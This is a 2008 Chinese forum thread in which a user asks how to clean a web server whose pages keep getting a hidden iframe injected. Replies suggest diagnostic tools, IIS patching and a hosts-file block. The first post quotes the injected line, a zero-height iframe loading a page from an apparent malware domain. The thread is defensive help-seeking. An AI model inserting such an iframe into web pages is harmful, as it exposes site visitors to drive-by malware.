1   1  /  1  页   跳转

关于网页挂马得防护

收藏
pc兔子
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-11-04
  • 来自:
发表于: 2008-11-04 13:57 | 只看楼主 短消息 资料
字号: 1楼

关于网页挂马得防护

我单位服务器上面有好几个网页,都被网页挂马了,症状是所有页面都包含
<iframe src="http://a.kx330.cn/wm/index.htm" width="100" height="0"></iframe>
瑞星杀毒无法查出问题。
请问如何根治?
---我们把所有网页中得这句话都手动删除,过两天自动又出来了。

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
分享到:
gototop
 
帅哥阿福
头像
雄霸杖朝狮
  • 帖子:21071
  • 注册: 2006-03-29
  • 来自:米兰
论坛8周年活动礼物祖国六十华诞09欢乐圣诞
发表于: 2008-11-04 14:04 | 短消息 资料
字号: 2楼

回复:关于网页挂马得防护

扫SRENG日志发这论坛来
下载SRENG2.6版工具:http://www.kztechs.com/sreng/download.html
SRENG工具的扫描日志操作,看这贴2楼:http://bbs.ikaka.com/showtopic-8442813.aspx
估计是服务器内有木马加载。
gototop
 
Fabregas
头像
叱咤花甲狮
  • 帖子:2863
  • 注册: 2008-03-01
  • 来自:
发表于: 2008-11-04 14:42 | 短消息 资料
字号: 3楼

回复:关于网页挂马得防护

如果服务器上安装了IIS,尽量打全系统补丁,因为除了病毒修改外,也有可能是黑客利用IIS漏洞,远程修改你服务器上的网页文件。
gototop
 
hoppyzha
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2008-11-03
  • 来自:
发表于: 2008-11-04 21:48 | 短消息 资料
字号: 4楼

回复:关于网页挂马得防护

也可以在C:\WINDOWS\system32\drivers\etc下面的host(记得用txt打开就可以了),然后网站前面加上127.0.0.1就可以阻止网站出现了!~
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT